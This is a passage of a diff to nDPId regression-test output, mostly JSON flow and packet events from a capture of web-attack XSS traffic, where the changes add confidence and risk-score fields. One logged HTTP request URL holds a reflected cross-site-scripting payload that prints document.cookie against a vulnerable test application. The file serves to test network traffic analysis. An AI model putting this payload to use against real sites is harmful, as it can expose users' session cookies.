+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347228091,"flow_last_seen":1499347294990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232370,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347285114,"flow_last_seen":1499347290698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347285114,"flow_last_seen":1499347290698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347286403,"flow_last_seen":1499347291698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347286403,"flow_last_seen":1499347291698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347286403,"flow_last_seen":1499347291698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347287659,"flow_last_seen":1499347292698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347287659,"flow_last_seen":1499347292698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347287659,"flow_last_seen":1499347292698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347415726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347417243,"flow_last_seen":1499347417243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347417243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1499347417243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347417243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82KJAAD4G7S2sEAABwKgKMt6GAFDK0UZQAAAAAKACchDO3gAAAgQFtAQCCAoBOp7yAAAAAAEDAwc="}
@@ -1453,18 +1453,18 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1499347423604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347423604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TspAAD4GdwasEAABwKgKMt7MAFD5I+viAAAAAKACchD0fQAAAgQFtAQCCAoBOqUoAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":1499347423604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347423604,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3szh681K+SPr46AScSDLowAAAgQFtAQCCAoD5HaeATqlKAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":1499347423605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347423605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TstAAD4Gdw2sEAABwKgKMt7MAFD5I+vj4evNS4AQAOVqqgAAAQEICgE6pSkD5Hae"}
-01005{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347419786,"flow_last_seen":1499347423605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347423605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AA0U7VCIO18AUKPZNB0ZXFCDF9PVHM0BRGOWM22EICNEPXK5UC%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347295224,"flow_last_seen":1499347300701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347419786,"flow_last_seen":1499347423605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347423605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AA0U7VCIO18AUKPZNB0ZXFCDF9PVHM0BRGOWM22EICNEPXK5UC%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347295224,"flow_last_seen":1499347300701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347295224,"flow_last_seen":1499347300701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347296462,"flow_last_seen":1499347301701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347296462,"flow_last_seen":1499347301701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347296462,"flow_last_seen":1499347301701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347297732,"flow_last_seen":1499347303701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347297732,"flow_last_seen":1499347303701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347297732,"flow_last_seen":1499347303701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347300263,"flow_last_seen":1499347305701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347300263,"flow_last_seen":1499347305701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347300263,"flow_last_seen":1499347305701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347301520,"flow_last_seen":1499347306702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347301520,"flow_last_seen":1499347306702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347301520,"flow_last_seen":1499347306702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347304125,"flow_last_seen":1499347309703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347304125,"flow_last_seen":1499347309703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347304125,"flow_last_seen":1499347309703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347425883,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347426122,"flow_last_seen":1499347426122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347426122,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1499347426122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347426122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vtlAAD4GBvesEAABwKgKMt7mAFDtahlHAAAAAKACchDQQgAAAgQFtAQCCAoBOqeeAAAAAAEDAwc="}
@@ -1490,17 +1490,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3889,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1499347433753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347433753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JW1AAD4GoGOsEAABwKgKMt84AFAetop\/AAAAAKACchAl+QAAAgQFtAQCCAoBOq8SAAAAAAEDAwc="}
